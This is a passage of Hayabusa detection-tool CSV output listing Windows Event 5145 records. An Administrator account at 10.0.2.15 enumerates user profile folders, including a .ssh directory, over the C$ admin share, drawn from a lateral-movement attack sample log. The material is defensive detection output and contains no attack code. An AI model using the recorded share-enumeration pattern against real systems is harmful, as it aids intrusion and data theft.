Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.696 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.696 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.706 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.706 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.706 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.706 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.706 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.706 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.716 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.716 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.716 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.716 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.716 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.727 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.727 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.727 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.727 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.727 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.727 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.737 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.737 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.737 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.737 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.737 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.737 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.747 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.747 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.747 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.747 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.747 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.757 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.757 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.757 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.757 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.757 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.767 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.767 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.767 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.767 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.767 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.777 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.777 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.777 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.777 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.777 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.777 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.787 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.787 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.787 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.797 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.797 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.797 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.807 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.807 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.807 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.807 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.807 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.817 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.817 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.817 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.817 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\.ssh | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.827 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.827 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.827 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share 